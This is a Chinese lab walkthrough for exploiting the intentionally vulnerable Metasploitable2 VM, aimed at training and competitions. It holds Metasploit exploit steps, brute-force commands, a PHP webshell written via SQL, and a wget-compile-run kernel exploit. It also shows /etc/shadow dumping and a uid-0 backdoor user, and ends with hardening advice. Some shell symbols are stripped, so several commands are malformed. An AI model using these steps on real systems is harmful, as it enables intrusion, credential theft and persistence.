Metasploitable2 全漏洞超详细完整实操手册

📅 2026/8/2 5:28:25
Metasploitable2 全漏洞超详细完整实操手册
前置环境攻击机 Kali Linux靶机 Metasploitable2同网段靶机默认账号msfadmin/msfadmin内核Linux 2.6.24-16-server32位Ubuntu。整体流程信息收集→端口服务漏洞利用远程拿权限→Web漏洞利用→弱口令爆破→本地提权→后渗透信息收集。约定靶机IP统一记为192.168.X.X下文用RHOST靶机IP、LHOSTKali本机IP。一、第一步全网信息收集必做发现靶机IP# 1. 局域网存活主机扫描 arp-scan -l # 2. 全端口深度扫描最全面 nmap -sV -A -p 1-65535 RHOST # 3. 漏洞脚本扫描 nmap --script vuln RHOST扫描开放核心端口高危服务清单端口服务版本漏洞类型21vsftpd2.3.4后门漏洞 CVE-2011-252322OpenSSH4.7p1弱口令爆破、老旧版本漏洞23Telnettelnetd明文传输、弱口令25Postfixsmtpd邮件钓鱼、SMTP漏洞53BIND9.4.2DNS漏洞、域传送80Apache2.2.8目录遍历、DVWA、phpMyAdmin、TWiki139/445Samba3.0.20命令注入 CVE-2007-24471099Java RMIRMI服务远程代码执行RCE1524bindshell预设后门直连Root3306MySQL5.0.51a弱口令、提权6667UnrealIRCd3.2.8.1官方植入后门8180Tomcat1.1后台部署木马、弱口令二、远程高危端口漏洞利用按上手难度排序漏洞121端口 vsftpd2.3.4 后门漏洞一键拿Root最简单漏洞原理用户名输入末尾携带:)笑脸符号程序会自动在6200端口打开root监听端口可直连root shell。方式1MSF框架一键利用推荐竞赛/实训# 1. 打开msf控制台 msfconsole # 2. 搜索漏洞模块 search vsftpd # 3. 加载漏洞模块 use exploit/unix/ftp/vsftpd_234_backdoor # 4. 查看必填参数 show options # 5. 设置目标IP set RHOSTS 靶机IP # 6. 执行攻击 exploit # 验证权限 whoami # 输出root即成功 id方式2手动Telnet不使用MSFtelnet RHOST 21 # 输入用户名 user test:) # 随便输入密码回车后等待几秒 pass 123456 # 新开终端连接6200端口 nc RHOST 6200 whoami漏洞2139/445 Samba usermap_script 命令注入CVE-2007-2447原理Samba3.0.20用户名映射脚本存在注入恶意用户名可执行系统命令直接root权限。msfconsole search usermap_script use exploit/multi/samba/usermap_script set RHOSTS 靶机IP exploit whoami漏洞36667端口 UnrealIRCd3.2.8.1 官方后门原理官方源码被植入后门向端口发送AB命令即可远程执行root命令。msfconsole search unreal_ircd use exploit/unix/irc/unreal_ircd_3281_backdoor set RHOSTS 靶机IP set RPORT 6667 exploit漏洞41524端口 预留bind后门最简单直连Root靶机预设后门端口无需任何漏洞nc直接连接拿到rootnc 靶机IP 1524 whoami漏洞51099 Java RMI 远程代码执行漏洞msfconsole search java_rmi_server use exploit/multi/misc/java_rmi_server set RHOSTS 靶机IP exploit漏洞623 Telnet 弱口令爆破Telnet明文传输默认存在大量弱口令MSF爆破msfconsole use auxiliary/scanner/telnet/telnet_login set RHOSTS 靶机IP set USER_FILE /usr/share/wordlists/rockyou.txt set PASS_FILE /usr/share/wordlists/rockyou.txt run已知弱口令msfadmin/msfadmin、root/root。漏洞73306 MySQL弱口令提权默认空密码/弱口令root登录后可写webshell、导出系统账户哈希# 本地连接测试 mysql -h 靶机IP -uroot -p # MSF爆破 use auxiliary/scanner/mysql/mysql_login set RHOSTS 靶机IP set USER root set PASS_FILE 字典路径 run漏洞88180 Tomcat后台部署漏洞Tomcat管理后台弱口令上传war木马获取shellmsfconsole search tomcat_mgr_deploy use exploit/multi/http/tomcat_mgr_deploy set RHOSTS 靶机IP set RPORT 8180 set USER admin set PASS admin exploit三、80端口Web全站漏洞详细利用访问http://靶机IP页面存在4个核心Web漏洞phpMyAdmin、TWiki、DVWA、目录泄露phpMyAdmin 漏洞路径http://RHOST/phpMyAdmin弱口令root空密码登录登录后可执行SQL写入一句话木马到网站根目录select ?php eval($_POST[cmd]);? into outfile /var/www/html/shell.php;菜刀/蚁剑连接木马拿到Web权限后本地提权root。TWiki 远程命令执行CVE-2005-2877路径/twikimsfconsole search twiki use exploit/unix/webapp/twiki_history_attachment_exec set RHOSTS 靶机IP exploitDVWA漏洞演练路径/dvwa基础SQL注入、XSS、文件上传、命令注入常规Web入门练习。Apache目录泄露WebDAVIIS/Apache开启目录浏览可下载源码、配置文件WebDAV可上传恶意脚本执行。四、SSH弱口令暴力破解22端口Kali自带hydra、MSF均可爆破方式1Hydra工具hydra -L user.txt -P pass.txt ssh://靶机IP # 内置字典快速测试 hydra -l msfadmin -P /usr/share/wordlists/rockyou.txt ssh://RHOST方式2MSF ssh_login模块use auxiliary/scanner/ssh/ssh_login set RHOSTS RHOST set USER_FILE 用户字典 set PASS_FILE 密码字典 run爆破成功拿到普通用户shell后续本地提权root。五、本地权限提升拿到普通用户后必学3种提权方式方式1SUID find命令提权最简单靶机自带普通用户登录后执行# 查找所有SUID文件 find / -perm -4000 2/dev/null # find拥有SUID权限一键提权root find / -exec /bin/sh \; -quit whoami方式2内核漏洞提权 CVE-2009-1185pipe缓冲区溢出靶机内核2.6.24存在高危溢出外网下载EXP编译执行# 1. 靶机内下载exp wget https://www.exploit-db.com/raw/8478 -O exp.c # 2. 编译 gcc exp.c -o exp # 3. 执行提权 chmod x ./exp ./exp whoami方式3定时任务、配置文件、sudo权限提权# 查看sudo权限 sudo -l # 查看定时任务 cat /etc/crontab # 查找可写入的系统脚本替换脚本反弹shell提权六、后渗透权限持久化信息收集竞赛取证常用拿到root后常规取证命令# 1. 导出账号密码哈希 cat /etc/passwd cat /etc/shadow # 合并哈希用于密码破解 unshadow passwd shadow hash.txt john hash.txt # 2. 查看网络、进程、日志 netstat -antp ps aux cat /var/log/auth.log # 3. 持久化后门 # 添加root后门用户 echo backdoor:x:0:0::/root:/bin/bash /etc/passwd # 写入定时反弹shell七、全漏洞利用速查表考试/比赛快速查阅vsftpd2.3.4use exploit/unix/ftp/vsftpd_234_backdoorSamba注入use exploit/multi/samba/usermap_scriptUnrealIRCd后门use exploit/unix/irc/unreal_ircd_3281_backdoorRMI漏洞use exploit/multi/misc/java_rmi_serverSSH爆破auxiliary/scanner/ssh/ssh_loginTelnet爆破auxiliary/scanner/telnet/telnet_loginSUID提权find / -exec /bin/sh \; -quit内核提权EXP编号8478编译执行八、加固修复方案对应D模块防御答题参考vsftpd升级至2.3.5以上关闭异常用户名监听Samba升级版本禁用usermap_script脚本IRC、Telnet高危明文端口直接关闭内核升级Linux内核打CVE漏洞补丁Web关闭目录浏览、删除phpMyAdmin弱口令、禁用WebDAV系统清理异常SUID文件、强密码策略、锁定账户、SSH密钥登录禁用密码登录。